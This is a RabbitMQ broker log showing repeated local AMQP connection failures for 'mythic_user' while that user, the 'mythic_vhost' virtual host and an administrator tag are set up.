2021-01-25 08:59:17.066 [error] <0.626.0> Error on AMQP connection <0.626.0> (127.0.0.1:53596 -> 127.0.0.1:5672, state: starting):
PLAIN login refused: user 'mythic_user' - invalid credentials
2021-01-25 08:59:17.066 [info] <0.632.0> closing AMQP connection <0.632.0> (127.0.0.1:53600 -> 127.0.0.1:5672)
2021-01-25 08:59:17.066 [info] <0.629.0> closing AMQP connection <0.629.0> (127.0.0.1:53598 -> 127.0.0.1:5672)
2021-01-25 08:59:17.068 [info] <0.626.0> closing AMQP connection <0.626.0> (127.0.0.1:53596 -> 127.0.0.1:5672)
2021-01-25 08:59:17.070 [error] <0.643.0> Error on AMQP connection <0.643.0> (127.0.0.1:53606 -> 127.0.0.1:5672, state: starting):
PLAIN login refused: user 'mythic_user' - invalid credentials
2021-01-25 08:59:17.072 [info] <0.643.0> closing AMQP connection <0.643.0> (127.0.0.1:53606 -> 127.0.0.1:5672)
2021-01-25 08:59:17.077 [info] <0.650.0> accepting AMQP connection <0.650.0> (127.0.0.1:53608 -> 127.0.0.1:5672)
2021-01-25 08:59:17.084 [error] <0.650.0> Error on AMQP connection <0.650.0> (127.0.0.1:53608 -> 127.0.0.1:5672, state: starting):
PLAIN login refused: user 'mythic_user' - invalid credentials
2021-01-25 08:59:17.084 [info] <0.650.0> closing AMQP connection <0.650.0> (127.0.0.1:53608 -> 127.0.0.1:5672)
2021-01-25 08:59:17.230 [info] <0.654.0> accepting AMQP connection <0.654.0> (127.0.0.1:53610 -> 127.0.0.1:5672)
2021-01-25 08:59:17.233 [error] <0.654.0> Error on AMQP connection <0.654.0> (127.0.0.1:53610 -> 127.0.0.1:5672, state: starting):
PLAIN login refused: user 'mythic_user' - invalid credentials
2021-01-25 08:59:17.235 [info] <0.654.0> closing AMQP connection <0.654.0> (127.0.0.1:53610 -> 127.0.0.1:5672)
2021-01-25 08:59:17.251 [info] <0.658.0> accepting AMQP connection <0.658.0> (127.0.0.1:53612 -> 127.0.0.1:5672)
2021-01-25 08:59:17.255 [error] <0.658.0> Error on AMQP connection <0.658.0> (127.0.0.1:53612 -> 127.0.0.1:5672, state: starting):
PLAIN login refused: user 'mythic_user' - invalid credentials
2021-01-25 08:59:17.257 [info] <0.658.0> closing AMQP connection <0.658.0> (127.0.0.1:53612 -> 127.0.0.1:5672)
2021-01-25 08:59:17.409 [info] <0.662.0> accepting AMQP connection <0.662.0> (127.0.0.1:53614 -> 127.0.0.1:5672)
2021-01-25 08:59:17.411 [error] <0.662.0> Error on AMQP connection <0.662.0> (127.0.0.1:53614 -> 127.0.0.1:5672, state: starting):
PLAIN login refused: user 'mythic_user' - invalid credentials
2021-01-25 08:59:17.411 [info] <0.662.0> closing AMQP connection <0.662.0> (127.0.0.1:53614 -> 127.0.0.1:5672)
2021-01-25 08:59:17.475 [info] <0.666.0> accepting AMQP connection <0.666.0> (127.0.0.1:53616 -> 127.0.0.1:5672)
2021-01-25 08:59:17.478 [error] <0.666.0> Error on AMQP connection <0.666.0> (127.0.0.1:53616 -> 127.0.0.1:5672, state: starting):
PLAIN login refused: user 'mythic_user' - invalid credentials
2021-01-25 08:59:17.479 [info] <0.666.0> closing AMQP connection <0.666.0> (127.0.0.1:53616 -> 127.0.0.1:5672)
2021-01-25 08:59:17.551 [info] <0.670.0> accepting AMQP connection <0.670.0> (127.0.0.1:53618 -> 127.0.0.1:5672)
2021-01-25 08:59:17.553 [error] <0.670.0> Error on AMQP connection <0.670.0> (127.0.0.1:53618 -> 127.0.0.1:5672, state: starting):
PLAIN login refused: user 'mythic_user' - invalid credentials
2021-01-25 08:59:17.554 [info] <0.670.0> closing AMQP connection <0.670.0> (127.0.0.1:53618 -> 127.0.0.1:5672)
Adding user "mythic_user" ...
2021-01-25 08:59:17.621 [info] <0.677.0> Creating user 'mythic_user'
2021-01-25 08:59:17.691 [info] <0.681.0> accepting AMQP connection <0.681.0> (127.0.0.1:53620 -> 127.0.0.1:5672)
2021-01-25 08:59:17.692 [info] <0.684.0> accepting AMQP connection <0.684.0> (127.0.0.1:53622 -> 127.0.0.1:5672)
2021-01-25 08:59:17.692 [info] <0.687.0> accepting AMQP connection <0.687.0> (127.0.0.1:53624 -> 127.0.0.1:5672)
2021-01-25 08:59:17.693 [info] <0.690.0> accepting AMQP connection <0.690.0> (127.0.0.1:53626 -> 127.0.0.1:5672)
2021-01-25 08:59:17.696 [error] <0.684.0> Error on AMQP connection <0.684.0> (127.0.0.1:53622 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
vhost mythic_vhost not found
2021-01-25 08:59:17.696 [info] <0.699.0> accepting AMQP connection <0.699.0> (127.0.0.1:53630 -> 127.0.0.1:5672)
2021-01-25 08:59:17.696 [info] <0.693.0> accepting AMQP connection <0.693.0> (127.0.0.1:53628 -> 127.0.0.1:5672)
2021-01-25 08:59:17.698 [info] <0.684.0> closing AMQP connection <0.684.0> (127.0.0.1:53622 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:17.698 [error] <0.681.0> Error on AMQP connection <0.681.0> (127.0.0.1:53620 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
vhost mythic_vhost not found
2021-01-25 08:59:17.699 [error] <0.690.0> Error on AMQP connection <0.690.0> (127.0.0.1:53626 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
vhost mythic_vhost not found
2021-01-25 08:59:17.700 [error] <0.693.0> Error on AMQP connection <0.693.0> (127.0.0.1:53628 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
vhost mythic_vhost not found
2021-01-25 08:59:17.700 [error] <0.699.0> Error on AMQP connection <0.699.0> (127.0.0.1:53630 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
vhost mythic_vhost not found
2021-01-25 08:59:17.700 [info] <0.690.0> closing AMQP connection <0.690.0> (127.0.0.1:53626 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:17.700 [error] <0.687.0> Error on AMQP connection <0.687.0> (127.0.0.1:53624 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
vhost mythic_vhost not found
2021-01-25 08:59:17.701 [info] <0.681.0> closing AMQP connection <0.681.0> (127.0.0.1:53620 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:17.704 [info] <0.687.0> closing AMQP connection <0.687.0> (127.0.0.1:53624 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:17.704 [info] <0.693.0> closing AMQP connection <0.693.0> (127.0.0.1:53628 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:17.704 [info] <0.699.0> closing AMQP connection <0.699.0> (127.0.0.1:53630 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:17.965 [info] <0.723.0> accepting AMQP connection <0.723.0> (127.0.0.1:53632 -> 127.0.0.1:5672)
2021-01-25 08:59:17.968 [error] <0.723.0> Error on AMQP connection <0.723.0> (127.0.0.1:53632 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
vhost mythic_vhost not found
2021-01-25 08:59:17.971 [info] <0.723.0> closing AMQP connection <0.723.0> (127.0.0.1:53632 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:18.087 [info] <0.730.0> accepting AMQP connection <0.730.0> (127.0.0.1:53634 -> 127.0.0.1:5672)
2021-01-25 08:59:18.090 [error] <0.730.0> Error on AMQP connection <0.730.0> (127.0.0.1:53634 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
vhost mythic_vhost not found
2021-01-25 08:59:18.091 [info] <0.730.0> closing AMQP connection <0.730.0> (127.0.0.1:53634 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:18.110 [info] <0.737.0> accepting AMQP connection <0.737.0> (127.0.0.1:53636 -> 127.0.0.1:5672)
2021-01-25 08:59:18.110 [info] <0.740.0> accepting AMQP connection <0.740.0> (127.0.0.1:53638 -> 127.0.0.1:5672)
2021-01-25 08:59:18.117 [error] <0.740.0> Error on AMQP connection <0.740.0> (127.0.0.1:53638 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
vhost mythic_vhost not found
2021-01-25 08:59:18.119 [error] <0.737.0> Error on AMQP connection <0.737.0> (127.0.0.1:53636 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
vhost mythic_vhost not found
2021-01-25 08:59:18.120 [info] <0.740.0> closing AMQP connection <0.740.0> (127.0.0.1:53638 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:18.120 [info] <0.737.0> closing AMQP connection <0.737.0> (127.0.0.1:53636 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:18.260 [info] <0.751.0> accepting AMQP connection <0.751.0> (127.0.0.1:53640 -> 127.0.0.1:5672)
2021-01-25 08:59:18.265 [error] <0.751.0> Error on AMQP connection <0.751.0> (127.0.0.1:53640 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
vhost mythic_vhost not found
2021-01-25 08:59:18.268 [info] <0.751.0> closing AMQP connection <0.751.0> (127.0.0.1:53640 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:18.486 [info] <0.758.0> accepting AMQP connection <0.758.0> (127.0.0.1:53642 -> 127.0.0.1:5672)
2021-01-25 08:59:18.491 [error] <0.758.0> Error on AMQP connection <0.758.0> (127.0.0.1:53642 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
vhost mythic_vhost not found
2021-01-25 08:59:18.493 [info] <0.758.0> closing AMQP connection <0.758.0> (127.0.0.1:53642 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:18.555 [info] <0.765.0> accepting AMQP connection <0.765.0> (127.0.0.1:53644 -> 127.0.0.1:5672)
2021-01-25 08:59:18.556 [info] <0.768.0> accepting AMQP connection <0.768.0> (127.0.0.1:53646 -> 127.0.0.1:5672)
2021-01-25 08:59:18.560 [error] <0.768.0> Error on AMQP connection <0.768.0> (127.0.0.1:53646 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
vhost mythic_vhost not found
2021-01-25 08:59:18.562 [info] <0.768.0> closing AMQP connection <0.768.0> (127.0.0.1:53646 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:18.562 [error] <0.765.0> Error on AMQP connection <0.765.0> (127.0.0.1:53644 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
vhost mythic_vhost not found
2021-01-25 08:59:18.563 [info] <0.765.0> closing AMQP connection <0.765.0> (127.0.0.1:53644 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:18.922 [info] <0.779.0> accepting AMQP connection <0.779.0> (127.0.0.1:53648 -> 127.0.0.1:5672)
2021-01-25 08:59:18.926 [error] <0.779.0> Error on AMQP connection <0.779.0> (127.0.0.1:53648 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
vhost mythic_vhost not found
2021-01-25 08:59:18.927 [info] <0.779.0> closing AMQP connection <0.779.0> (127.0.0.1:53648 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:18.973 [info] <0.786.0> accepting AMQP connection <0.786.0> (127.0.0.1:53650 -> 127.0.0.1:5672)
2021-01-25 08:59:18.978 [error] <0.786.0> Error on AMQP connection <0.786.0> (127.0.0.1:53650 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
vhost mythic_vhost not found
2021-01-25 08:59:18.979 [info] <0.786.0> closing AMQP connection <0.786.0> (127.0.0.1:53650 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:19.066 [info] <0.793.0> accepting AMQP connection <0.793.0> (127.0.0.1:53652 -> 127.0.0.1:5672)
2021-01-25 08:59:19.066 [info] <0.796.0> accepting AMQP connection <0.796.0> (127.0.0.1:53654 -> 127.0.0.1:5672)
2021-01-25 08:59:19.069 [info] <0.799.0> accepting AMQP connection <0.799.0> (127.0.0.1:53656 -> 127.0.0.1:5672)
2021-01-25 08:59:19.070 [info] <0.802.0> accepting AMQP connection <0.802.0> (127.0.0.1:53658 -> 127.0.0.1:5672)
2021-01-25 08:59:19.071 [error] <0.796.0> Error on AMQP connection <0.796.0> (127.0.0.1:53654 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
vhost mythic_vhost not found
2021-01-25 08:59:19.071 [info] <0.809.0> accepting AMQP connection <0.809.0> (127.0.0.1:53660 -> 127.0.0.1:5672)
2021-01-25 08:59:19.071 [error] <0.793.0> Error on AMQP connection <0.793.0> (127.0.0.1:53652 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
vhost mythic_vhost not found
2021-01-25 08:59:19.073 [error] <0.799.0> Error on AMQP connection <0.799.0> (127.0.0.1:53656 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
vhost mythic_vhost not found
2021-01-25 08:59:19.073 [error] <0.802.0> Error on AMQP connection <0.802.0> (127.0.0.1:53658 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
vhost mythic_vhost not found
2021-01-25 08:59:19.073 [info] <0.793.0> closing AMQP connection <0.793.0> (127.0.0.1:53652 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:19.074 [info] <0.821.0> accepting AMQP connection <0.821.0> (127.0.0.1:53662 -> 127.0.0.1:5672)
2021-01-25 08:59:19.075 [error] <0.809.0> Error on AMQP connection <0.809.0> (127.0.0.1:53660 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
vhost mythic_vhost not found
2021-01-25 08:59:19.076 [info] <0.799.0> closing AMQP connection <0.799.0> (127.0.0.1:53656 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:19.076 [info] <0.802.0> closing AMQP connection <0.802.0> (127.0.0.1:53658 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:19.077 [info] <0.809.0> closing AMQP connection <0.809.0> (127.0.0.1:53660 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:19.078 [error] <0.821.0> Error on AMQP connection <0.821.0> (127.0.0.1:53662 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
vhost mythic_vhost not found
2021-01-25 08:59:19.078 [info] <0.796.0> closing AMQP connection <0.796.0> (127.0.0.1:53654 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:19.080 [info] <0.821.0> closing AMQP connection <0.821.0> (127.0.0.1:53662 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:19.093 [info] <0.835.0> accepting AMQP connection <0.835.0> (127.0.0.1:53664 -> 127.0.0.1:5672)
2021-01-25 08:59:19.097 [error] <0.835.0> Error on AMQP connection <0.835.0> (127.0.0.1:53664 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
vhost mythic_vhost not found
2021-01-25 08:59:19.098 [info] <0.835.0> closing AMQP connection <0.835.0> (127.0.0.1:53664 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
Adding vhost "mythic_vhost" ...
2021-01-25 08:59:19.117 [info] <0.845.0> Adding vhost 'mythic_vhost'
2021-01-25 08:59:19.129 [info] <0.856.0> Making sure data directory '/var/lib/rabbitmq/mnesia/rabbit@my-ubuntu/msg_stores/vhosts/7F51CDIDSAQ9O5A6T3PF6U1DA' for vhost 'mythic_vhost' exists
2021-01-25 08:59:19.134 [info] <0.856.0> Starting message stores for vhost 'mythic_vhost'
2021-01-25 08:59:19.134 [info] <0.860.0> Message store "7F51CDIDSAQ9O5A6T3PF6U1DA/msg_store_transient": using rabbit_msg_store_ets_index to provide index
2021-01-25 08:59:19.136 [info] <0.856.0> Started message store of type transient for vhost 'mythic_vhost'
2021-01-25 08:59:19.136 [info] <0.863.0> Message store "7F51CDIDSAQ9O5A6T3PF6U1DA/msg_store_persistent": using rabbit_msg_store_ets_index to provide index
2021-01-25 08:59:19.137 [warning] <0.863.0> Message store "7F51CDIDSAQ9O5A6T3PF6U1DA/msg_store_persistent": rebuilding indices from scratch
2021-01-25 08:59:19.144 [info] <0.856.0> Started message store of type persistent for vhost 'mythic_vhost'
2021-01-25 08:59:19.238 [info] <0.889.0> accepting AMQP connection <0.889.0> (127.0.0.1:53666 -> 127.0.0.1:5672)
2021-01-25 08:59:19.241 [error] <0.889.0> Error on AMQP connection <0.889.0> (127.0.0.1:53666 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:19.242 [info] <0.889.0> closing AMQP connection <0.889.0> (127.0.0.1:53666 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:19.269 [info] <0.896.0> accepting AMQP connection <0.896.0> (127.0.0.1:53668 -> 127.0.0.1:5672)
2021-01-25 08:59:19.271 [error] <0.896.0> Error on AMQP connection <0.896.0> (127.0.0.1:53668 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:19.272 [info] <0.896.0> closing AMQP connection <0.896.0> (127.0.0.1:53668 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:19.415 [info] <0.903.0> accepting AMQP connection <0.903.0> (127.0.0.1:53670 -> 127.0.0.1:5672)
2021-01-25 08:59:19.419 [error] <0.903.0> Error on AMQP connection <0.903.0> (127.0.0.1:53670 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:19.421 [info] <0.903.0> closing AMQP connection <0.903.0> (127.0.0.1:53670 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:19.496 [info] <0.910.0> accepting AMQP connection <0.910.0> (127.0.0.1:53672 -> 127.0.0.1:5672)
2021-01-25 08:59:19.498 [error] <0.910.0> Error on AMQP connection <0.910.0> (127.0.0.1:53672 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:19.499 [info] <0.910.0> closing AMQP connection <0.910.0> (127.0.0.1:53672 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:19.565 [info] <0.917.0> accepting AMQP connection <0.917.0> (127.0.0.1:53674 -> 127.0.0.1:5672)
2021-01-25 08:59:19.568 [error] <0.917.0> Error on AMQP connection <0.917.0> (127.0.0.1:53674 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:19.569 [info] <0.917.0> closing AMQP connection <0.917.0> (127.0.0.1:53674 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:19.704 [info] <0.924.0> accepting AMQP connection <0.924.0> (127.0.0.1:53676 -> 127.0.0.1:5672)
2021-01-25 08:59:19.704 [info] <0.927.0> accepting AMQP connection <0.927.0> (127.0.0.1:53678 -> 127.0.0.1:5672)
2021-01-25 08:59:19.709 [info] <0.930.0> accepting AMQP connection <0.930.0> (127.0.0.1:53680 -> 127.0.0.1:5672)
2021-01-25 08:59:19.709 [info] <0.933.0> accepting AMQP connection <0.933.0> (127.0.0.1:53682 -> 127.0.0.1:5672)
2021-01-25 08:59:19.710 [info] <0.936.0> accepting AMQP connection <0.936.0> (127.0.0.1:53684 -> 127.0.0.1:5672)
2021-01-25 08:59:19.710 [info] <0.939.0> accepting AMQP connection <0.939.0> (127.0.0.1:53686 -> 127.0.0.1:5672)
2021-01-25 08:59:19.715 [error] <0.927.0> Error on AMQP connection <0.927.0> (127.0.0.1:53678 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:19.716 [error] <0.930.0> Error on AMQP connection <0.930.0> (127.0.0.1:53680 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:19.717 [error] <0.939.0> Error on AMQP connection <0.939.0> (127.0.0.1:53686 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:19.717 [error] <0.936.0> Error on AMQP connection <0.936.0> (127.0.0.1:53684 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:19.717 [info] <0.930.0> closing AMQP connection <0.930.0> (127.0.0.1:53680 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:19.717 [info] <0.927.0> closing AMQP connection <0.927.0> (127.0.0.1:53678 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:19.718 [error] <0.933.0> Error on AMQP connection <0.933.0> (127.0.0.1:53682 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:19.719 [info] <0.936.0> closing AMQP connection <0.936.0> (127.0.0.1:53684 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:19.719 [error] <0.924.0> Error on AMQP connection <0.924.0> (127.0.0.1:53676 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:19.720 [info] <0.939.0> closing AMQP connection <0.939.0> (127.0.0.1:53686 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:19.721 [info] <0.933.0> closing AMQP connection <0.933.0> (127.0.0.1:53682 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:19.722 [info] <0.924.0> closing AMQP connection <0.924.0> (127.0.0.1:53676 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:19.982 [info] <0.966.0> accepting AMQP connection <0.966.0> (127.0.0.1:53688 -> 127.0.0.1:5672)
2021-01-25 08:59:19.989 [error] <0.966.0> Error on AMQP connection <0.966.0> (127.0.0.1:53688 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:19.990 [info] <0.966.0> closing AMQP connection <0.966.0> (127.0.0.1:53688 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:20.101 [info] <0.973.0> accepting AMQP connection <0.973.0> (127.0.0.1:53690 -> 127.0.0.1:5672)
2021-01-25 08:59:20.103 [error] <0.973.0> Error on AMQP connection <0.973.0> (127.0.0.1:53690 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:20.105 [info] <0.973.0> closing AMQP connection <0.973.0> (127.0.0.1:53690 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:20.125 [info] <0.980.0> accepting AMQP connection <0.980.0> (127.0.0.1:53692 -> 127.0.0.1:5672)
2021-01-25 08:59:20.125 [info] <0.983.0> accepting AMQP connection <0.983.0> (127.0.0.1:53694 -> 127.0.0.1:5672)
2021-01-25 08:59:20.129 [error] <0.980.0> Error on AMQP connection <0.980.0> (127.0.0.1:53692 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:20.129 [error] <0.983.0> Error on AMQP connection <0.983.0> (127.0.0.1:53694 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:20.142 [info] <0.980.0> closing AMQP connection <0.980.0> (127.0.0.1:53692 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:20.142 [info] <0.983.0> closing AMQP connection <0.983.0> (127.0.0.1:53694 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:20.275 [info] <0.994.0> accepting AMQP connection <0.994.0> (127.0.0.1:53696 -> 127.0.0.1:5672)
2021-01-25 08:59:20.277 [error] <0.994.0> Error on AMQP connection <0.994.0> (127.0.0.1:53696 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:20.277 [info] <0.994.0> closing AMQP connection <0.994.0> (127.0.0.1:53696 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:20.502 [info] <0.1001.0> accepting AMQP connection <0.1001.0> (127.0.0.1:53698 -> 127.0.0.1:5672)
2021-01-25 08:59:20.505 [error] <0.1001.0> Error on AMQP connection <0.1001.0> (127.0.0.1:53698 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:20.505 [info] <0.1001.0> closing AMQP connection <0.1001.0> (127.0.0.1:53698 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
Setting tags for user "mythic_user" to [administrator] ...
2021-01-25 08:59:20.511 [info] <0.1011.0> Setting user tags for user 'mythic_user' to [administrator]
2021-01-25 08:59:20.572 [info] <0.1015.0> accepting AMQP connection <0.1015.0> (127.0.0.1:53700 -> 127.0.0.1:5672)
2021-01-25 08:59:20.575 [info] <0.1018.0> accepting AMQP connection <0.1018.0> (127.0.0.1:53702 -> 127.0.0.1:5672)
2021-01-25 08:59:20.577 [error] <0.1015.0> Error on AMQP connection <0.1015.0> (127.0.0.1:53700 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:20.582 [info] <0.1015.0> closing AMQP connection <0.1015.0> (127.0.0.1:53700 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:20.594 [error] <0.1018.0> Error on AMQP connection <0.1018.0> (127.0.0.1:53702 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:20.597 [info] <0.1018.0> closing AMQP connection <0.1018.0> (127.0.0.1:53702 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:20.930 [info] <0.1029.0> accepting AMQP connection <0.1029.0> (127.0.0.1:53704 -> 127.0.0.1:5672)
2021-01-25 08:59:20.934 [error] <0.1029.0> Error on AMQP connection <0.1029.0> (127.0.0.1:53704 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:20.935 [info] <0.1029.0> closing AMQP connection <0.1029.0> (127.0.0.1:53704 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:20.993 [info] <0.1036.0> accepting AMQP connection <0.1036.0> (127.0.0.1:53706 -> 127.0.0.1:5672)
2021-01-25 08:59:21.007 [error] <0.1036.0> Error on AMQP connection <0.1036.0> (127.0.0.1:53706 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:21.009 [info] <0.1036.0> closing AMQP connection <0.1036.0> (127.0.0.1:53706 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:21.078 [info] <0.1043.0> accepting AMQP connection <0.1043.0> (127.0.0.1:53710 -> 127.0.0.1:5672)
2021-01-25 08:59:21.079 [info] <0.1046.0> accepting AMQP connection <0.1046.0> (127.0.0.1:53712 -> 127.0.0.1:5672)
2021-01-25 08:59:21.080 [info] <0.1049.0> accepting AMQP connection <0.1049.0> (127.0.0.1:53708 -> 127.0.0.1:5672)
2021-01-25 08:59:21.081 [info] <0.1052.0> accepting AMQP connection <0.1052.0> (127.0.0.1:53714 -> 127.0.0.1:5672)
2021-01-25 08:59:21.082 [info] <0.1055.0> accepting AMQP connection <0.1055.0> (127.0.0.1:53716 -> 127.0.0.1:5672)
2021-01-25 08:59:21.083 [info] <0.1058.0> accepting AMQP connection <0.1058.0> (127.0.0.1:53718 -> 127.0.0.1:5672)
2021-01-25 08:59:21.086 [error] <0.1043.0> Error on AMQP connection <0.1043.0> (127.0.0.1:53710 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:21.086 [error] <0.1046.0> Error on AMQP connection <0.1046.0> (127.0.0.1:53712 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:21.087 [error] <0.1049.0> Error on AMQP connection <0.1049.0> (127.0.0.1:53708 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:21.087 [error] <0.1052.0> Error on AMQP connection <0.1052.0> (127.0.0.1:53714 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:21.087 [error] <0.1058.0> Error on AMQP connection <0.1058.0> (127.0.0.1:53718 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:21.088 [info] <0.1043.0> closing AMQP connection <0.1043.0> (127.0.0.1:53710 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
